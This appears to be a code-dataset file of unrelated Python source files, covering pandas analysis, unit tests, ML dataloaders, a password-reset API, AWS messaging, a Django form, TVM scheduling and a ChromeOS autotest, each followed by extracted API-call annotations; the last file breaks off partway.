[((781, 823), 're.search', 're.search', (['VSRE', 'version_string_line', 're.M'], {}), '(VSRE, version_string_line, re.M)\n', (790, 823), False, 'import re\n'), ((1687, 1724), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'where': '"""src"""'}), "(where='src')\n", (1711, 1724), False, 'import setuptools\n')]
# -------------- # Importing header files import numpy as np import pandas as pd from scipy.stats import mode # code starts here bank = pd.read_csv(path) categorical_var = bank.select_dtypes(include = 'object') print(categorical_var) numerical_var = bank.select_dtypes(include = 'number') print(numerical_var) banks = bank.drop(columns=['Loan_ID']) bank_mode = banks.mode() banks = banks.fillna(bank_mode.iloc[0]) print(banks.isnull().sum()) avg_loan_amount = pd.pivot_table(banks, index=['Gender', 'Married', 'Self_Employed'], values='LoanAmount', aggfunc = 'mean') print(avg_loan_amount) loan_approved_se = banks[ (banks['Self_Employed'] == "Yes") & (banks['Loan_Status'] == "Y") ] loan_approved_nse = banks[ (banks['Self_Employed'] == "No") & (banks['Loan_Status'] == "Y") ] percentage_se = (len(loan_approved_se) / 614) * 100 percentage_nse = (len(loan_approved_nse) / 614) * 100 # loan amount term loan_term = banks['Loan_Amount_Term'].apply(lambda x: int(x)/12 ) big_loan_term=len(loan_term[loan_term>=25]) print(big_loan_term) columns_to_show = ['ApplicantIncome', 'Credit_History'] loan_groupby=banks.groupby(['Loan_Status'])[columns_to_show] # Check the mean value mean_values=loan_groupby.agg([np.mean]) print(mean_values) # code ends here
[ "pandas.pivot_table", "pandas.read_csv" ]
[((150, 167), 'pandas.read_csv', 'pd.read_csv', (['path'], {}), '(path)\n', (161, 167), True, 'import pandas as pd\n'), ((489, 598), 'pandas.pivot_table', 'pd.pivot_table', (['banks'], {'index': "['Gender', 'Married', 'Self_Employed']", 'values': '"""LoanAmount"""', 'aggfunc': '"""mean"""'}), "(banks, index=['Gender', 'Married', 'Self_Employed'], values=\n 'LoanAmount', aggfunc='mean')\n", (503, 598), True, 'import pandas as pd\n')]
from unittest import TestCase from unittest.mock import patch from easy2fa import cli class TestCheckInput(TestCase): @patch('builtins.input') def test_default(self, mock_input): mock_input.return_value = '' self.assertEquals(cli.check_input('prompt', default='one'), 'one') mock_input.return_value = 'two' self.assertEquals(cli.check_input('prompt', default='one'), 'two') @patch('builtins.input') @patch('builtins.print') def test_assertions(self, mock_print, mock_input): def assertion(value): if value not in ['yes', 'no']: return 'use yes or no' mock_input.side_effect = ['input', '', 'no'] self.assertEquals(cli.check_input('prompt', assertion=assertion), 'no') mock_print.assert_called_with('\tInvalid input: use yes or no')
[ "easy2fa.cli.check_input", "unittest.mock.patch" ]
[((126, 149), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {}), "('builtins.input')\n", (131, 149), False, 'from unittest.mock import patch\n'), ((423, 446), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {}), "('builtins.input')\n", (428, 446), False, 'from unittest.mock import patch\n'), ((452, 475), 'unittest.mock.patch', 'patch', (['"""builtins.print"""'], {}), "('builtins.print')\n", (457, 475), False, 'from unittest.mock import patch\n'), ((253, 293), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'default': '"""one"""'}), "('prompt', default='one')\n", (268, 293), False, 'from easy2fa import cli\n'), ((368, 408), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'default': '"""one"""'}), "('prompt', default='one')\n", (383, 408), False, 'from easy2fa import cli\n'), ((723, 769), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'assertion': 'assertion'}), "('prompt', assertion=assertion)\n", (738, 769), False, 'from easy2fa import cli\n')]
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from bert_finetuning.data import GermanData class GermanDataLoader: def __init__( self, data_paths, model_name, do_cleansing, max_sequence_length, batch_size=8, dataset_cls=GermanData, ): self.german_data = dataset_cls( data_paths, model_name, max_sequence_length=max_sequence_length, do_cleansing=do_cleansing, ) self.batch_size = batch_size self.create_loaders() def create_loaders(self): """ Create Torch dataloaders for data splits """ self.german_data.text_to_tensors() print("creating dataloaders") train_data = TensorDataset( self.german_data.train_inputs, self.german_data.train_masks, self.german_data.train_labels, ) train_sampler = RandomSampler(train_data) self.train_dataloader = DataLoader( train_data, sampler=train_sampler, batch_size=self.batch_size ) validation_data = TensorDataset( self.german_data.validation_inputs, self.german_data.validation_masks, self.german_data.validation_labels, ) validation_sampler = SequentialSampler(validation_data) self.validation_dataloader = DataLoader( validation_data, sampler=validation_sampler, batch_size=self.batch_size ) test_data = TensorDataset( self.german_data.test_inputs, self.german_data.test_masks, self.german_data.test_labels, ) test_sampler = SequentialSampler(test_data) self.test_dataloader = DataLoader( test_data, sampler=test_sampler, batch_size=self.batch_size ) print("finished creating dataloaders") """ ** FOR DEBUGGING ** if __name__ == "__main__": ## define data paths germeval_data_paths = { "train": "./datasets/hasoc_dataset/hasoc_german_train.csv", "dev": "./datasets/hasoc_dataset/hasoc_german_validation.csv", "test": "./datasets/hasoc_dataset/hasoc_german_test.csv", } hasoc_german_data_paths = { "train": "./datasets/hasoc_dataset/hasoc_german_train.csv", "dev": "./datasets/hasoc_dataset/hasoc_german_validation.csv", "test": "./datasets/hasoc_dataset/hasoc_german_test.csv", } ## create dataloaders print("creating germeval dataloaders...") germ_eval_dataloader = GermanDataLoader(germeval_data_paths) print("creating hasoc dataloaders...") hasoc_german_dataloader = GermanDataLoader(hasoc_german_data_paths) """
[ "torch.utils.data.RandomSampler", "torch.utils.data.SequentialSampler", "torch.utils.data.TensorDataset", "torch.utils.data.DataLoader" ]
[((837, 946), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.train_inputs', 'self.german_data.train_masks', 'self.german_data.train_labels'], {}), '(self.german_data.train_inputs, self.german_data.train_masks,\n self.german_data.train_labels)\n', (850, 946), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1019, 1044), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_data'], {}), '(train_data)\n', (1032, 1044), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1078, 1151), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'sampler': 'train_sampler', 'batch_size': 'self.batch_size'}), '(train_data, sampler=train_sampler, batch_size=self.batch_size)\n', (1088, 1151), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1205, 1330), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.validation_inputs', 'self.german_data.validation_masks', 'self.german_data.validation_labels'], {}), '(self.german_data.validation_inputs, self.german_data.\n validation_masks, self.german_data.validation_labels)\n', (1218, 1330), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1407, 1441), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['validation_data'], {}), '(validation_data)\n', (1424, 1441), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1480, 1568), 'torch.utils.data.DataLoader', 'DataLoader', (['validation_data'], {'sampler': 'validation_sampler', 'batch_size': 'self.batch_size'}), '(validation_data, sampler=validation_sampler, batch_size=self.\n batch_size)\n', (1490, 1568), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1611, 1717), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.test_inputs', 'self.german_data.test_masks', 'self.german_data.test_labels'], {}), '(self.german_data.test_inputs, self.german_data.test_masks,\n self.german_data.test_labels)\n', (1624, 1717), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1789, 1817), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['test_data'], {}), '(test_data)\n', (1806, 1817), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1850, 1921), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'sampler': 'test_sampler', 'batch_size': 'self.batch_size'}), '(test_data, sampler=test_sampler, batch_size=self.batch_size)\n', (1860, 1921), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n')]
# -*- coding: utf-8 -*- import logging import datetime from flask import request, render_template from flask_jwt_extended import ( create_access_token, decode_token ) from jwt.exceptions import DecodeError from flasgger import swag_from from http import HTTPStatus from pathlib import Path from sqlalchemy.orm.exc import NoResultFound from vantage6.common import logger_name from vantage6.server import db from vantage6.server.resource import ( ServicesResources ) module_name = logger_name(__name__) log = logging.getLogger(module_name) def setup(api, api_base, services): path = "/".join([api_base, module_name]) log.info(f'Setting up "{path}" and subdirectories') api.add_resource( ResetPassword, path+'/reset', endpoint="reset_password", methods=('POST',), resource_class_kwargs=services ) api.add_resource( RecoverPassword, path+'/lost', endpoint='recover_password', methods=('POST',), resource_class_kwargs=services ) # ------------------------------------------------------------------------------ # Resources / API's # ------------------------------------------------------------------------------ class ResetPassword(ServicesResources): """user can use recover token to reset their password.""" @swag_from(str(Path(r"swagger/post_reset_password.yaml")), endpoint='reset_password') def post(self): """"submit email-adress receive token.""" # retrieve user based on email or username body = request.get_json() reset_token = body.get("reset_token") password = body.get("password") if not reset_token or not password: return {"msg": "reset token and/or password is missing!"}, \ HTTPStatus.BAD_REQUEST # obtain user try: user_id = decode_token(reset_token)['identity'].get('id') except DecodeError: return {"msg": "Invalid recovery token!"}, HTTPStatus.BAD_REQUEST log.debug(user_id) user = db.User.get(user_id) # set password user.set_password(password) user.save() log.info(f"Successfull password reset for '{user.username}'") return {"msg": "password successfully been reset!"}, \ HTTPStatus.OK class RecoverPassword(ServicesResources): """send a mail containing a recover token""" @swag_from(str(Path(r"swagger/post_recover_password.yaml")), endpoint='recover_password') def post(self): """username or email generates a token which is mailed.""" # default return string ret = {"msg": "If the username or email is our database you " "will soon receive an email"} # obtain username/email from request' body = request.get_json() username = body.get("username") email = body.get("email") if not (email or username): return {"msg": "No username or email provided!"}, \ HTTPStatus.BAD_REQUEST # find user in the database, if not here we stop! try: if username: user = db.User.get_by_username(username) else: user = db.User.get_by_email(email) except NoResultFound: # we do not tell them.... But we won't continue either return ret log.info(f"Password reset requested for '{user.username}'") # generate a token that can reset their password expires = datetime.timedelta(hours=1) reset_token = create_access_token( {"id": str(user.id)}, expires_delta=expires ) self.mail.send_email( "password reset", sender="<EMAIL>", recipients=[user.email], text_body=render_template("mail/reset_password_token.txt", token=reset_token), html_body=render_template("mail/reset_password_token.html", token=reset_token) ) return ret
[ "logging.getLogger", "flask.render_template", "vantage6.server.db.User.get", "vantage6.server.db.User.get_by_email", "pathlib.Path", "vantage6.server.db.User.get_by_username", "flask_jwt_extended.decode_token", "flask.request.get_json", "vantage6.common.logger_name", "datetime.timedelta" ]
[((494, 515), 'vantage6.common.logger_name', 'logger_name', (['__name__'], {}), '(__name__)\n', (505, 515), False, 'from vantage6.common import logger_name\n'), ((522, 552), 'logging.getLogger', 'logging.getLogger', (['module_name'], {}), '(module_name)\n', (539, 552), False, 'import logging\n'), ((1577, 1595), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1593, 1595), False, 'from flask import request, render_template\n'), ((2094, 2114), 'vantage6.server.db.User.get', 'db.User.get', (['user_id'], {}), '(user_id)\n', (2105, 2114), False, 'from vantage6.server import db\n'), ((2862, 2880), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (2878, 2880), False, 'from flask import request, render_template\n'), ((3582, 3609), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (3600, 3609), False, 'import datetime\n'), ((1354, 1394), 'pathlib.Path', 'Path', (['"""swagger/post_reset_password.yaml"""'], {}), "('swagger/post_reset_password.yaml')\n", (1358, 1394), False, 'from pathlib import Path\n'), ((2468, 2510), 'pathlib.Path', 'Path', (['"""swagger/post_recover_password.yaml"""'], {}), "('swagger/post_recover_password.yaml')\n", (2472, 2510), False, 'from pathlib import Path\n'), ((3214, 3247), 'vantage6.server.db.User.get_by_username', 'db.User.get_by_username', (['username'], {}), '(username)\n', (3237, 3247), False, 'from vantage6.server import db\n'), ((3289, 3316), 'vantage6.server.db.User.get_by_email', 'db.User.get_by_email', (['email'], {}), '(email)\n', (3309, 3316), False, 'from vantage6.server import db\n'), ((3869, 3936), 'flask.render_template', 'render_template', (['"""mail/reset_password_token.txt"""'], {'token': 'reset_token'}), "('mail/reset_password_token.txt', token=reset_token)\n", (3884, 3936), False, 'from flask import request, render_template\n'), ((3998, 4066), 'flask.render_template', 'render_template', (['"""mail/reset_password_token.html"""'], {'token': 'reset_token'}), "('mail/reset_password_token.html', token=reset_token)\n", (4013, 4066), False, 'from flask import request, render_template\n'), ((1897, 1922), 'flask_jwt_extended.decode_token', 'decode_token', (['reset_token'], {}), '(reset_token)\n', (1909, 1922), False, 'from flask_jwt_extended import create_access_token, decode_token\n')]
import os from typing import Any, Callable, Dict import tomodachi from tomodachi import aws_sns_sqs, aws_sns_sqs_publish from tomodachi.discovery import AWSSNSRegistration from tomodachi.envelope import JsonBase async def middleware_function( func: Callable, service: Any, message: Any, topic: str, context: Dict, *args: Any, **kwargs: Any ) -> Any: # Functionality before function is called service.log("middleware before") return_value = await func(*args, **kwargs) # There's also the possibility to pass in extra arguments or keywords arguments, for example: # return_value = await func(*args, id='overridden', **kwargs) # Functinoality after function is called service.log("middleware after") return return_value class ExampleAWSSNSSQSService(tomodachi.Service): name = "example-aws-sns-sqs-service" log_level = "INFO" uuid = str(os.environ.get("SERVICE_UUID") or "") # Build own "discovery" functions, to be run on start and stop # See tomodachi/discovery/aws_sns_registration.py for example discovery = [AWSSNSRegistration] # The message envelope class defines how a message should be processed when sent and received # See tomodachi/envelope/json_base.py for a basic example using JSON and transferring some metadata message_envelope = JsonBase # Adds a middleware function that is run on every incoming message. # Several middlewares can be chained. message_middleware = [middleware_function] # Some options can be specified to define credentials, used ports, hostnames, access log, etc. options = { "aws_sns_sqs": { "region_name": None, # specify AWS region (example: 'eu-west-1') "aws_access_key_id": None, # specify AWS access key (example: '<KEY>') "aws_secret_access_key": None, # specify AWS secret key (example: 'f7sha92hNotarealsecretkeyn29ShnSYQi3nzgA') }, "aws_endpoint_urls": { "sns": None, # For example 'http://localhost:4575' if localstack is used for testing "sqs": None, # For example 'http://localhost:4576' if localstack is used for testing }, } @aws_sns_sqs("example-route1") async def route1a(self, data: Any) -> None: self.log('Received data (function: route1a) - "{}"'.format(data)) async def _started_service(self) -> None: async def publish(data: Any, topic: str) -> None: self.log('Publish data "{}"'.format(data)) await aws_sns_sqs_publish(self, data, topic=topic, wait=False) await publish("友達", "example-route1")
[ "tomodachi.aws_sns_sqs_publish", "os.environ.get", "tomodachi.aws_sns_sqs" ]
[((2184, 2213), 'tomodachi.aws_sns_sqs', 'aws_sns_sqs', (['"""example-route1"""'], {}), "('example-route1')\n", (2195, 2213), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\n'), ((891, 921), 'os.environ.get', 'os.environ.get', (['"""SERVICE_UUID"""'], {}), "('SERVICE_UUID')\n", (905, 921), False, 'import os\n'), ((2514, 2570), 'tomodachi.aws_sns_sqs_publish', 'aws_sns_sqs_publish', (['self', 'data'], {'topic': 'topic', 'wait': '(False)'}), '(self, data, topic=topic, wait=False)\n', (2533, 2570), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\n')]
# -*- coding: utf-8 -*- # @Author: GXR # @CreateTime: 2022-01-20 # @UpdateTime: 2022-01-20 import redis import config import cookie_login from cookie_api import app red = redis.Redis( host=config.REDIS_HOST, port=config.REDIS_PORT, db=config.REDIS_DB, decode_responses=True, ) # 刷新cookie数量 def cookie_refresh(): while 1: cookie_list = red.smembers(config.REDIS_KEY_COOKIE) if len(cookie_list) >= config.COOKIE_COUNT: break cookie_login.run_cookie_login(1) app.logger.info("[cookie数量正常]-[%s]" % len(cookie_list)) def run_cookie_refresh(): cookie_refresh() if __name__ == "__main__": run_cookie_refresh()
[ "cookie_login.run_cookie_login", "redis.Redis" ]
[((174, 281), 'redis.Redis', 'redis.Redis', ([], {'host': 'config.REDIS_HOST', 'port': 'config.REDIS_PORT', 'db': 'config.REDIS_DB', 'decode_responses': '(True)'}), '(host=config.REDIS_HOST, port=config.REDIS_PORT, db=config.\n REDIS_DB, decode_responses=True)\n', (185, 281), False, 'import redis\n'), ((484, 516), 'cookie_login.run_cookie_login', 'cookie_login.run_cookie_login', (['(1)'], {}), '(1)\n', (513, 516), False, 'import cookie_login\n')]
# -*- coding: utf-8 -*- from __future__ import unicode_literals # start tutorial from django.db import models from djng.forms import NgModelFormMixin, NgFormValidationMixin from djng.styling.bootstrap3.forms import Bootstrap3ModelForm class SubscribeUser(models.Model): full_name = models.CharField( "<NAME>", max_length=99) avatar = models.ImageField("Avatar", blank=False, null=True) permit = models.FileField("Permit", blank=True, null=True) class SubscribeForm(NgModelFormMixin, NgFormValidationMixin, Bootstrap3ModelForm): use_required_attribute = False scope_prefix = 'subscribe_data' form_name = 'my_form' class Meta: model = SubscribeUser fields = ['full_name', 'avatar', 'permit']
[ "django.db.models.ImageField", "django.db.models.FileField", "django.db.models.CharField" ]
[((288, 329), 'django.db.models.CharField', 'models.CharField', (['"""<NAME>"""'], {'max_length': '(99)'}), "('<NAME>', max_length=99)\n", (304, 329), False, 'from django.db import models\n'), ((361, 412), 'django.db.models.ImageField', 'models.ImageField', (['"""Avatar"""'], {'blank': '(False)', 'null': '(True)'}), "('Avatar', blank=False, null=True)\n", (378, 412), False, 'from django.db import models\n'), ((427, 476), 'django.db.models.FileField', 'models.FileField', (['"""Permit"""'], {'blank': '(True)', 'null': '(True)'}), "('Permit', blank=True, null=True)\n", (443, 476), False, 'from django.db import models\n')]
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=invalid-name """Compute and schedule for add, multiply, subtract slice op Please note the following assumptions made by the implementation: 1) The inputs will be multiple of crouton layout except for the axis that needs broadcasting.""" from tvm import te from tvm import tir from tvm import topi from ..utils import get_layout_transform_fn def add_broadcast_compute(input_a, input_b): """Call the add op from topi""" return topi.add(input_a, input_b) def subtract_broadcast_compute(input_a, input_b): """Call the subtract op from topi""" return topi.subtract(input_a, input_b) def multiply_broadcast_compute(input_a, input_b): """Call the multiply op from topi""" return topi.multiply(input_a, input_b) def tir_broadcast_schedule( out_m, input_a, input_b, output_layout: str, input_a_layout: str, input_b_layout: str, op_name: str, ): """Schedule for input and output layout nhwc-8h2w32c2w-2d considering broadcast""" func = te.create_prim_func([input_a, input_b, out_m]) s = tir.Schedule(func) block_dict = {"add": "T_add", "subtract": "T_subtract", "multiply": "T_multiply"} block = s.get_block(block_dict[op_name]) if input_a_layout == "nhwc-8h2w32c2w-2d": input_a_transformed_layout = get_layout_transform_fn(input_a_layout) s.transform_layout(block, buffer=("read", 0), index_map=input_a_transformed_layout) if input_b_layout == "nhwc-8h2w32c2w-2d": input_b_transformed_layout = get_layout_transform_fn(input_b_layout) s.transform_layout(block, buffer=("read", 1), index_map=input_b_transformed_layout) output_transformed_layout = get_layout_transform_fn(output_layout) s.transform_layout(block, buffer=("write", 0), index_map=output_transformed_layout) n, h, w, c = s.get_loops(block) h_o, h_i = s.split(h, [None, 8]) w_o, w_i = s.split(w, [None, 4]) c_o, c_i = s.split(c, [None, 32]) wio, wii = s.split(w_i, [None, 2]) s.reorder(n, h_o, w_o, c_o, h_i, wio, c_i, wii) fused = s.fuse(c_i, wii) s.vectorize(fused) return s
[ "tvm.topi.add", "tvm.tir.Schedule", "tvm.te.create_prim_func", "tvm.topi.subtract", "tvm.topi.multiply" ]
[((1274, 1300), 'tvm.topi.add', 'topi.add', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1282, 1300), False, 'from tvm import topi\n'), ((1410, 1441), 'tvm.topi.subtract', 'topi.subtract', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1423, 1441), False, 'from tvm import topi\n'), ((1551, 1582), 'tvm.topi.multiply', 'topi.multiply', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1564, 1582), False, 'from tvm import topi\n'), ((1856, 1902), 'tvm.te.create_prim_func', 'te.create_prim_func', (['[input_a, input_b, out_m]'], {}), '([input_a, input_b, out_m])\n', (1875, 1902), False, 'from tvm import te\n'), ((1914, 1932), 'tvm.tir.Schedule', 'tir.Schedule', (['func'], {}), '(func)\n', (1926, 1932), False, 'from tvm import tir\n')]
# Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import json import logging import os import unittest from telemetry.core import browser_finder from telemetry.core import exceptions from telemetry.core import extension_to_load from telemetry.core import util from telemetry.core.backends.chrome import cros_interface from telemetry.unittest import options_for_unittests class CrOSAutoTest(unittest.TestCase): def setUp(self): options = options_for_unittests.GetCopy() self._cri = cros_interface.CrOSInterface(options.cros_remote, options.cros_ssh_identity) self._is_guest = options.browser_type == 'cros-chrome-guest' self._username = '' if self._is_guest else options.browser_options.username self._password = options.browser_options.password def _IsCryptohomeMounted(self): """Returns True if cryptohome is mounted""" cryptohomeJSON, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome', '--action=status']) cryptohomeStatus = json.loads(cryptohomeJSON) return (cryptohomeStatus['mounts'] and cryptohomeStatus['mounts'][0]['mounted']) def _CreateBrowser(self, autotest_ext=False, auto_login=True): """Finds and creates a browser for tests. if autotest_ext is True, also loads the autotest extension""" options = options_for_unittests.GetCopy() if autotest_ext: extension_path = os.path.join(os.path.dirname(__file__), 'autotest_ext') self._load_extension = extension_to_load.ExtensionToLoad( path=extension_path, browser_type=options.browser_type, is_component=True) options.extensions_to_load = [self._load_extension] browser_to_create = browser_finder.FindBrowser(options) self.assertTrue(browser_to_create) options.browser_options.create_browser_with_oobe = True options.browser_options.auto_login = auto_login b = browser_to_create.Create() b.Start() return b def _GetAutotestExtension(self, browser): """Returns the autotest extension instance""" extension = browser.extensions[self._load_extension] self.assertTrue(extension) return extension def _GetLoginStatus(self, browser): extension = self._GetAutotestExtension(browser) self.assertTrue(extension.EvaluateJavaScript( "typeof('chrome.autotestPrivate') != 'undefined'")) extension.ExecuteJavaScript(''' window.__login_status = null; chrome.autotestPrivate.loginStatus(function(s) { window.__login_status = s; }); ''') return util.WaitFor( lambda: extension.EvaluateJavaScript('window.__login_status'), 10) def testCryptohomeMounted(self): """Verifies cryptohome mount status for regular and guest user and when logged out""" with self._CreateBrowser() as b: self.assertEquals(1, len(b.tabs)) self.assertTrue(b.tabs[0].url) self.assertTrue(self._IsCryptohomeMounted()) chronos_fs = self._cri.FilesystemMountedAt('/home/chronos/user') self.assertTrue(chronos_fs) if self._is_guest: self.assertEquals(chronos_fs, 'guestfs') else: home, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome-path', 'user', self._username]) self.assertEquals(self._cri.FilesystemMountedAt(home.rstrip()), chronos_fs) self.assertFalse(self._IsCryptohomeMounted()) self.assertEquals(self._cri.FilesystemMountedAt('/home/chronos/user'), '/dev/mapper/encstateful') def testLoginStatus(self): """Tests autotestPrivate.loginStatus""" with self._CreateBrowser(autotest_ext=True) as b: login_status = self._GetLoginStatus(b) self.assertEquals(type(login_status), dict) self.assertEquals(not self._is_guest, login_status['isRegularUser']) self.assertEquals(self._is_guest, login_status['isGuest']) self.assertEquals(login_status['email'], self._username) self.assertFalse(login_status['isScreenLocked']) def _IsScreenLocked(self, browser): return self._GetLoginStatus(browser)['isScreenLocked'] def _LockScreen(self, browser): self.assertFalse(self._IsScreenLocked(browser)) extension = self._GetAutotestExtension(browser) self.assertTrue(extension.EvaluateJavaScript( "typeof chrome.autotestPrivate.lockScreen == 'function'")) logging.info('Locking screen') extension.ExecuteJavaScript('chrome.autotestPrivate.lockScreen();') logging.info('Waiting for the lock screen') def ScreenLocked(): return (browser.oobe and browser.oobe.EvaluateJavaScript("typeof Oobe == 'function'") and browser.oobe.EvaluateJavaScript( "typeof Oobe.authenticateForTesting == 'function'")) util.WaitFor(ScreenLocked, 10) self.assertTrue(self._IsScreenLocked(browser)) def _AttemptUnlockBadPassword(self, browser): logging.info('Trying a bad password') def ErrorBubbleVisible(): return not browser.oobe.EvaluateJavaScript(''' document.getElementById('bubble').hidden ''') self.assertFalse(ErrorBubbleVisible()) browser.oobe.ExecuteJavaScript(''' Oobe.authenticateForTesting('%s', 'bad'); ''' % self._username) util.WaitFor(ErrorBubbleVisible, 10) self.assertTrue(self._IsScreenLocked(browser)) def _UnlockScreen(self, browser): logging.info('Unlocking') browser.oobe.ExecuteJavaScript(''' Oobe.authenticateForTesting('%s', '%s'); ''' % (self._username, self._password)) util.WaitFor(lambda: not browser.oobe, 10) self.assertFalse(self._IsScreenLocked(browser)) def testScreenLock(self): """Tests autotestPrivate.screenLock""" with self._CreateBrowser(autotest_ext=True) as browser: self._LockScreen(browser) self._AttemptUnlockBadPassword(browser) self._UnlockScreen(browser) def testLogout(self): """Tests autotestPrivate.logout""" with self._CreateBrowser(autotest_ext=True) as b: extension = self._GetAutotestExtension(b) try: extension.ExecuteJavaScript('chrome.autotestPrivate.logout();') except (exceptions.BrowserConnectionGoneException, exceptions.BrowserGoneException): pass util.WaitFor(lambda: not self._IsCryptohomeMounted(), 20) def _SwitchRegion(self, region): self._cri.RunCmdOnDevice(['stop', 'ui']) # Change VPD (requires RW-enabled firmware). # To save time, region and initial_timezone are not set. vpd = {'initial_locale': region.language_code, 'keyboard_layout': region.keyboard} for (key, value) in vpd.items(): self._cri.RunCmdOnDevice(['vpd', '-s', '"%s"="%s"' % (key, value)]) # Remove cached files to clear initial locale info and force regeneration. self._cri.RunCmdOnDevice(['rm', '/home/chronos/Local\ State']) self._cri.RunCmdOnDevice(['rm', '/home/chronos/.oobe_completed']) self._cri.RunCmdOnDevice(['dump_vpd_log', '--force']) self._cri.RunCmdOnDevice(['start', 'ui']) def _OobeHasOption(self, browser, selectId, value): hasOptionJs = ''' // Check that the option is present, and selected if it is the default. (function hasOption(selectId, value, isDefault) { var options = document.getElementById(selectId).options; for (var i = 0; i < options.length; i++) { if (options[i].value == value) { // The option is present. Make sure it's selected if necessary. return !isDefault || options.selectedIndex == i; } } return false; })("%s", "%s", %s); ''' return browser.oobe.EvaluateJavaScript( hasOptionJs % (selectId, value, 'true')) def _ResolveLanguage(self, locale): # If the locale matches a language but not the country, fall back to # an existing locale. See ui/base/l10n/l10n_util.cc. lang, _, region = map(str.lower, locale.partition('-')) if not region: return "" # Map from other countries to a localized country if lang == 'es' and region == 'es': return 'es-419' if lang == 'zh': if region in ('hk', 'mo'): return 'zh-TW' return 'zh-CN' if lang == 'en': if region in ('au', 'ca', 'nz', 'za'): return 'en-GB' return 'en-US' # No mapping found return "" def testOobeLocalization(self): """Tests different region configurations at OOBE""" # Save the original device localization settings. # To save time, only read initial_locale and keyboard_layout. initial_region = self.Region('', '', '', '', '') initial_region.language_code, _ = self._cri.RunCmdOnDevice( ['vpd', '-g', 'initial_locale']) initial_region.keyboard, _ = self._cri.RunCmdOnDevice( ['vpd', '-g', 'keyboard_layout']) for region in self.REGIONS_LIST: self._SwitchRegion(region) with self._CreateBrowser(auto_login=False) as browser: # Ensure the dropdown lists have been created. util.WaitFor(lambda: browser.oobe.EvaluateJavaScript( 'document.getElementById("language-select") != null'), 10) # Find the language, or an acceptable fallback value. languageFound = self._OobeHasOption(browser, 'language-select', region.language_code) if not languageFound: fallback = self._ResolveLanguage(region.language_code) self.assertTrue(fallback and self._OobeHasOption(browser, 'language-select', fallback)) # Find the keyboard layout. self.assertTrue(self._OobeHasOption( browser, 'keyboard-select', region.keyboard)) # Test is finished. Restore original region settings. self._SwitchRegion(initial_region) # The Region class and region list will be available in regions.py. class Region(object): def __init__(self, region_code, keyboard, time_zone, language_code, keyboard_mechanical_layout, description=None, notes=None): self.region_code = region_code self.keyboard = keyboard self.time_zone = time_zone self.language_code = language_code self.keyboard_mechanical_layout = keyboard_mechanical_layout self.description = description or region_code self.notes = notes class Enum(frozenset): def __getattr__(self, name): if name in self: return name raise AttributeError KeyboardMechanicalLayout = Enum(['ANSI', 'ISO', 'JIS', 'ABNT2']) _KML = KeyboardMechanicalLayout REGIONS_LIST = [ Region('au', 'xkb:us::eng', 'Australia/Sydney', 'en-AU', _KML.ANSI, 'Australia'), Region('ca.ansi', 'xkb:us::eng', 'America/Toronto', 'en-CA', _KML.ANSI, 'Canada (US keyboard)', 'Canada with US (ANSI) keyboard; see http://goto/cros-canada'), Region('ca.fr', 'xkb:ca::fra', 'America/Toronto', 'fr-CA', _KML.ISO, 'Canada (French keyboard)', ('Canadian French (ISO) keyboard. The most common configuration for ' 'Canadian French SKUs. See http://goto/cros-canada')), Region('ca.hybrid', 'xkb:ca:eng:eng', 'America/Toronto', 'en-CA', _KML.ISO, 'Canada (hybrid)', ('Canada with hybrid xkb:ca:eng:eng + xkb:ca::fra keyboard (ISO), ' 'defaulting to English language and keyboard. Used only if there ' 'needs to be a single SKU for all of Canada. See ' 'http://goto/cros-canada')), Region('ca.multix', 'xkb:ca:multix:fra', 'America/Toronto', 'fr-CA', _KML.ISO, 'Canada (multilingual)', ("Canadian Multilingual keyboard; you probably don't want this. See " "http://goto/cros-canada")), Region('de', 'xkb:de::ger', 'Europe/Berlin', 